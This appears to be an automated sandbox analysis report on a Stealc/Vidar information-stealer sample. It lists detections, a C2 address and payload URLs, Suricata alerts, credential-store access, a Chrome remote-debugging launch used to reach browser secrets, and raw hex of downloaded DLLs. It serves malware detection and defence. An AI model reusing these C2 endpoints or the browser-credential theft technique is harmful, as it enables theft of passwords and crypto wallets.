
Windows Analysis Report
random(1).exe

Overview

General Information

Sample name: random(1).exe
Analysis ID: 1629904
MD5: 1e95dc10fef7079a5d3fa793732a7cce
SHA1: 8e9ccb511e76c921c6ddf2a2615a2e3c86ea4113
SHA256: 81ac77037e15e56a6cdc0ba7e2af38e3e5a9f7a353054276c763e57d03db5ec1
Tags: 185-215-113-209, exe, user-JAMESWT_MHT

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Yara detected Credential Stealer

Classification

  • System is w10x64
  • random(1).exe (PID: 7600 cmdline: "C:\Users\user\Desktop\random(1).exe" MD5: 1E95DC10FEF7079A5D3FA793732A7CCE)
    • chrome.exe (PID: 7828 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 8060 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 --field-trial-handle=2280,i,4646147605048899530,4272269093725665048,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "185.215.113.115/c4becf79229cb002.php", "Botnet": "reno"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.2013235084.00000000008BD000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1728661894.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2013442010.0000000000C81000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: random(1).exe PID: 7600 | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security

System Summary

Source: Process started, Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\random(1).exe", ParentImage: C:\Users\user\Desktop\random(1).exe, ParentProcessId: 7600, ParentProcessName: random(1).exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 7828, ProcessName: chrome.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-05T09:25:19.994526+0100 | 2044245 | 1 | Malware Command and Control Activity Detected | 185.215.113.115 | 80 | 192.168.2.4 | 49733 | TCP
2025-03-05T09:25:19.951807+0100 | 2044244 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 185.215.113.115 | 80 | TCP
2025-03-05T09:25:20.213690+0100 | 2044246 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 185.215.113.115 | 80 | TCP
2025-03-05T09:25:23.114853+0100 | 2044248 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 185.215.113.115 | 80 | TCP
2025-03-05T09:25:20.221069+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 185.215.113.115 | 80 | 192.168.2.4 | 49733 | TCP
2025-03-05T09:25:19.684968+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 185.215.113.115 | 80 | TCP
2025-03-05T09:25:23.711035+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 185.215.113.115 | 80 | TCP
2025-03-05T09:25:37.225833+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49759 | 185.215.113.115 | 80 | TCP
2025-03-05T09:25:38.551142+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49759 | 185.215.113.115 | 80 | TCP
2025-03-05T09:25:39.190525+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49759 | 185.215.113.115 | 80 | TCP
2025-03-05T09:25:39.730719+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49759 | 185.215.113.115 | 80 | TCP
2025-03-05T09:25:41.399367+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49759 | 185.215.113.115 | 80 | TCP
2025-03-05T09:25:41.784440+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49759 | 185.215.113.115 | 80 | TCP


AV Detection

Source: random(1).exe, Avira: detected
Source: http://185.215.113.115/68b591d6548ec281/vcruntime140.dlln, Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpAAFBGDBKJJJKFIIIJ, Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/vcruntime140.dllc, Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/msvcp140.dllBN, Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/nss3.dllw, Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/freebl3.dllbN, Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/vcruntime140.dlls, Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpp, Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpl, Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phprowser, Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll;, Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpC, Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phper, Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpve, Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpO, Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpW, Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/mozglue.dlle, Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/softokn3.dllA, Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/freebl3.dllO, Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll., Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpR0, Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.php%0, Avira URL Cloud: Label: malware
Source: http://185.215.113.115/Y, Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/msvcp140.dllzN, Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/sqlite3.dll=, Avira URL Cloud: Label: malware
Source: random(1).exe.7600.0.memstrmin, Malware Configuration Extractor: StealC {"C2 url": "185.215.113.115/c4becf79229cb002.php", "Botnet": "reno"}
Source: random(1).exe, ReversingLabs: Detection: 78%
Source: random(1).exe, Virustotal: Detection: 77%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\Desktop\random(1).exe, Code function: 0_2_6C5EA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,0_2_6C5EA9A0
Source: C:\Users\user\Desktop\random(1).exe, Code function: 0_2_6C5E4440 PK11_PrivDecrypt,0_2_6C5E4440
Source: C:\Users\user\Desktop\random(1).exe, Code function: 0_2_6C5B4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,0_2_6C5B4420
Source: C:\Users\user\Desktop\random(1).exe, Code function: 0_2_6C5E44C0 PK11_PubEncrypt,0_2_6C5E44C0
Source: C:\Users\user\Desktop\random(1).exe, Code function: 0_2_6C6325B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,0_2_6C6325B0
Source: C:\Users\user\Desktop\random(1).exe, Code function: 0_2_6C5EA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,0_2_6C5EA650
Source: C:\Users\user\Desktop\random(1).exe, Code function: 0_2_6C5C8670 PK11_ExportEncryptedPrivKeyInfo,0_2_6C5C8670
Source: C:\Users\user\Desktop\random(1).exe, Code function: 0_2_6C5CE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,0_2_6C5CE6E0
Source: C:\Users\user\Desktop\random(1).exe, Code function: 0_2_6C60A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,0_2_6C60A730
Source: C:\Users\user\Desktop\random(1).exe, Code function: 0_2_6C610180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,0_2_6C610180
Source: C:\Users\user\Desktop\random(1).exe, Code function: 0_2_6C5E43B0 PK11_PubEncryptPKCS1,PR_SetError,0_2_6C5E43B0
Source: C:\Users\user\Desktop\random(1).exe, Code function: 0_2_6C607C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,0_2_6C607C00
Source: C:\Users\user\Desktop\random(1).exe, Code function: 0_2_6C5C7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,0_2_6C5C7D60
Source: C:\Users\user\Desktop\random(1).exe, Code function: 0_2_6C60BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,0_2_6C60BD30
Source: C:\Users\user\Desktop\random(1).exe, Code function: 0_2_6C609EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,0_2_6C609EC0
Source: C:\Users\user\Desktop\random(1).exe, Code function: 0_2_6C5E3FF0 PK11_PrivDecryptPKCS1,0_2_6C5E3FF0
Source: C:\Users\user\Desktop\random(1).exe, Code function: 0_2_6C5E3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,0_2_6C5E3850
Source: C:\Users\user\Desktop\random(1).exe, Code function: 0_2_6C5E9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,0_2_6C5E9840
Source: C:\Users\user\Desktop\random(1).exe, Code function: 0_2_6C60DA40 SEC_PKCS7ContentIsEncrypted,0_2_6C60DA40
Source: random(1).exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49837 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49835 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49841 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: random(1).exe, 00000000.00000002.2028941439.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: random(1).exe, 00000000.00000002.2028941439.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\random(1).exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\random(1).exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\random(1).exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\random(1).exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\random(1).exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\random(1).exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

Source: Network traffic, Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49733 -> 185.215.113.115:80
Source: Network traffic, Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49733 -> 185.215.113.115:80
Source: Network traffic, Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.115:80 -> 192.168.2.4:49733
Source: Network traffic, Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49733 -> 185.215.113.115:80
Source: Network traffic, Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.115:80 -> 192.168.2.4:49733
Source: Network traffic, Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49733 -> 185.215.113.115:80
Source: Malware configuration extractor, URLs: 185.215.113.115/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 08:25:23 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 08:25:37 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 
00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
